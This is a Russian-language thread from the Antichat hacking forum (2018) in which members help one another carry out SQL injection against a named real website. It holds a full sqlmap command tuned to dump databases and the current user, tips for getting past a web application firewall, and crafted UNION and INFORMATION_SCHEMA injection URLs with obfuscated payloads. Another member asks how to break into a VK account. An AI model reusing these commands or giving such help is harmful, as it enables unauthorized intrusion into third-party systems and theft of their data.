HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2281  
Старый 07.04.2018, 18:45
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от 17919  

как аккаунт вк открыть?
судя по постам в разных темах, то для тебя только один вариант, написать на бумажке аккаунт и встав на колени перед ним молить великого Бога контакта и всея соцсети что бы он открылся
 
Ответить с цитированием

  #2282  
Старый 07.04.2018, 21:10
17919
Новичок
Регистрация: 26.01.2016
Сообщений: 14
С нами: 5419766

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  

судя по постам в разных темах, то для тебя только один вариант, написать на бумажке аккаунт и встав на колени перед ним молить великого Бога контакта и всея соцсети что бы он открылся
с чего такой детский вывод?
 
Ответить с цитированием

  #2283  
Старый 08.04.2018, 00:53
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
С нами: 8859263

Репутация: 334
По умолчанию

Цитата:
Сообщение от 17919  

с чего такой детский вывод?
Цитата:
 
Ответить с цитированием

  #2284  
Старый 08.04.2018, 21:27
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
С нами: 5738006

Репутация: 147


По умолчанию

хз, на счёт sqli, и не помню чтоб такое дисклоузили, а вот xxe там пофиксили 2 месяца назад...

опять же это то, что из открытого
 
Ответить с цитированием

  #2285  
Старый 10.04.2018, 03:29
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами: 6868406

Репутация: 2
По умолчанию

Цитата:
Сообщение от Vip77  
похоже на WAF

попробуй --current-user

бывает такое что базу не достает, но пользователя бд читает.

еще вариант искать другу скулю на сайте, возможно где будет UNION или error based.
 
Ответить с цитированием

  #2286  
Старый 17.04.2018, 00:03
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами: 7782806

Репутация: 0
По умолчанию

нмап не может раскрутить скулу

.SpoilerTarget" type="button">Spoiler: 2
sqlmap -u http://wellaprof.elle.ru/competition...=date&offset=9 --dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.

Ручками так выходит ошибка:

Incorrect usage of UNION and ORDER BY

Проблема в фильтрации или на самом деле скули там нет?
 
Ответить с цитированием

  #2287  
Старый 17.04.2018, 00:41
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию

Цитата:
Сообщение от Muracha  

нмап не может раскрутить скулу
Spoiler: 2
sqlmap -u
http://wellaprof.elle.ru/competition...=date&offset=9
--dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.
Ручками так выходит ошибка:
Incorrect usage of UNION and ORDER BY
Проблема в фильтрации или на самом деле скули там нет?
Скуля там есть это 100%

по ошибке всё ясно там может waf стоит ща сам гляну
 
Ответить с цитированием

  #2288  
Старый 17.04.2018, 00:44
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию

Цитата:
Сообщение от Muracha  

нмап не может раскрутить скулу
Spoiler: 2
sqlmap -u
http://wellaprof.elle.ru/competition...=date&offset=9
--dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.
Ручками так выходит ошибка:
Incorrect usage of UNION and ORDER BY
Проблема в фильтрации или на самом деле скули там нет?
http://wellaprof.elle.ru/competitio...R(101),CHAR(109),CHAR(109),CHAR(97))) ),1)-- 1
 
Ответить с цитированием

  #2289  
Старый 17.04.2018, 01:17
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами: 7782806

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #2290  
Старый 17.04.2018, 01:56
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами: 7782806

Репутация: 0
По умолчанию

И почему не работает запрос, он же верный по своей структуре?

.SpoilerTarget" type="button">Spoiler: 1
http://wellaprof.elle.ru/competitio...(),concat(0x3a,CONCAT(AES_DECRYPT(AES _ENCRYPT(TABLE_NAME,0x71),0x71))))%2c1)+FROM+INFORMATION_SCHEMA.TABLES%20--%202
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.